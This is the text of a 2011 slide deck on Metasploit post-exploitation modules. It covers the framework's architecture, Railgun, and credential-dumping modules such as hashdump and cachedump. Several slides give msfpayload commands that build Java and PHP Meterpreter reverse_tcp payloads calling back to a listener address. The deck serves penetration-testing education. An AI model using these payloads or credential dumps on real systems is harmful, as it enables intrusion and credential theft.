Deep Dive into Red Teaming

with the Metasploit Framework

James “egyp7” Lee
March 22, 2011

1
 Outline

• Metasploit Framework architecture

• What are Metasploit modules?
• Post-exploitation modules
• Building other types of payloads
• Platform-agnostic payloads
• New Metasploit Express/Pro features
• Live Demo

This presentation is for advanced

Metasploit Framework users!

2
 Metasploit overview

• Metasploit Project founded in 2003

• Open Source penetration testing platform based with over
1 million downloads in the past year
• Acquired by Rapid7 in 2009
• HD Moore joined Rapid7 as Chief Security Office and Chief
Architect of Metasploit
• Rapid7 remains committed to the Community
• Metasploit Framework is the foundation for the
commercial editions Metasploit Express and Metasploit
Pro

3
 Metasploit Framework architecture

LIBRARIES INTERFACES
Console
TOOLS Rex

CLI
MSF Core
GUI &
Armitage

PLUGINS MSF Base

RPC

MODULES

Exploit Payload Encoder NOP Auxiliary

4
 Metasploit Framework architecture

LIBRARIES INTERFACES
Console
TOOLS Rex

CLI
MSF Core
GUI &
Armitage

PLUGINS MSF Base

RPC

MODULES

Exploit Payload Encoder NOP Auxiliary

5
 What are Metasploit modules?

• More than just exploits

• Payloads – the “arbitrary code” you hear about in
advisories
• Encoders – add entropy to payloads, remove bad
characters
• NOP – create sophisticated nopsleds
• Auxiliary – Like an exploit module but without a payload
– Underappreciated

6
 Metasploit Framework architecture

LIBRARIES INTERFACES
Console
TOOLS Rex

CLI
MSF Core
GUI &
Armitage

PLUGINS MSF Base

RPC

MODULES
Post
Exploit Payload Encoder NOP Auxiliary

7
 Back in the day

• Best post-exploitation option was irb

• Still staggeringly useful but hard to automate
• Enter: Meterpreter scripts

8
 Meterpreter scripts

Good Not so good

• Re-read before every run • No structure
– Easier development • No meta data
• Simple interface • No generic compatibility
• Anything Ruby can do checks
• Access to the framework • Ad-hoc options
and the session • Only work on Meterpreter
• Not easy to reuse code
 New hotness: post-exploitation modules

• Newest and least-explored module type

– Great place to start contributing to the framework
• Intended to replace Meterpreter scripts
– Should retain good aspects
– Improve the not-so-good aspects

Post

10
 Keeping the good

• Always reloaded when run from meterpreter>

– Can use reload and rerun commands in msf>
• Simple Interface
• Anything Ruby can do
• Access to the Framework and the session
– Actually easier than scripts

11
 Improving the not-so-good

• Structured like other module types

– Improves consistency
– Includes metadata like author, description, etc.
• Option setting consistent with other modules
– set VAR value
• mixins for some common tasks, more on the way
– File system manipulation
– Registry twiddling
– Running commands

12
 Using post-exploitation modules

• Like exploits, can be Active or Passive

• Like aux, add run command, exploit is an alias
• Take a session option
• Define what kinds of sessions are compatible
– Meterpreter, shell
– Different platforms

13
 Three ways to run them

• Directly from meterpreter> with run command

– run post/windows/gather/resolve_sid SID=S-1-5-1
• Via normal module interface
– use post/windows/gather/resolve_sid
– set SID S-1-5-1
– run
• As an AutoRunScript
– use exploit/some/module
– set AutoRunScript
post/windows/gather/resolve_sid SID=S-1-5-1
– exploit

14
 Railgun

• Not new exactly, but undergoing some major

improvements
• Arbitrary Ruby -> remote Windows API bridge
• Call any function in any DLL on the system
• Use an application’s own API against it
– Chrome/Firefox stored passwords
– Many potential uses here

15
 Loot

• Pilfered data
• Can be anything, stored in a file
– Process listing
– Environment variables
• Usually not passwords (use Creds table for that)

16
 Awesome Post Modules

• Hashdump
– Similar in function to the hashdump command
– Instead of injecting into lsass, just reads the registry
– Calculates everything necessary to pull hashes directly out of SAM
• There’s an OSX version now!
– Reads /var/db/shadow/hash/<user guid>
– Grabs SHA1, NT, and LM hashes

17
 Third-party post-exploitation modules

• Cachedump from Maurizio Agazzini

– Like hashdump, but grabs cached credentials
– mscash format for easy cracking (can’t be used with pass-the-
hash)
– Gets credentials from terminal services/rdp users
– Will eventually be merged into trunk but serves as an example of
adding your own stuff

18
 Modules in the works

• Something for going from shell -> Meterpreter

– And from Java/PHP -> native Meterpreter
• Local exploits!
– Already have modules for four windows privilege escalations
– And a generic service auditor
– Also planning to implement Linux local exploits for shell sessions
• Porting scripts to the module format

19
 Where to put it…

• Official modules live in msf3/modules/

– Subdirectories organized by module type (exploit/,
auxiliary/, post/, …)
• ~/.msf3/modules/ has same structure, loaded at
startup if it exists

20
Platform-agnostic payloads
 Java

• msfpayload java/meterpreter/reverse_tcp
LHOST=192.168.99.1 X > foo.jar
• msfpayload java/meterpreter/reverse_tcp
LHOST=192.168.99.1 W > foo.war

22
 PHP

• msfpayload php/meterpreter_reverse_tcp
LHOST=192.168.99.1 R > foo.php

23
 Commercial Feature Highlights

Pro console! All of the

above and more is easily
accessible in
Metasploit Pro
Console

24
 Commercial Feature Highlights

Post-exploitation
Modules in
Metasploit
Pro/Express

25
 Commercial Feature Highlights

Host tags are Awesome™

26
Quick demos
Questions?

James “egyp7” Lee

@egyp7

egypt@metasploit.com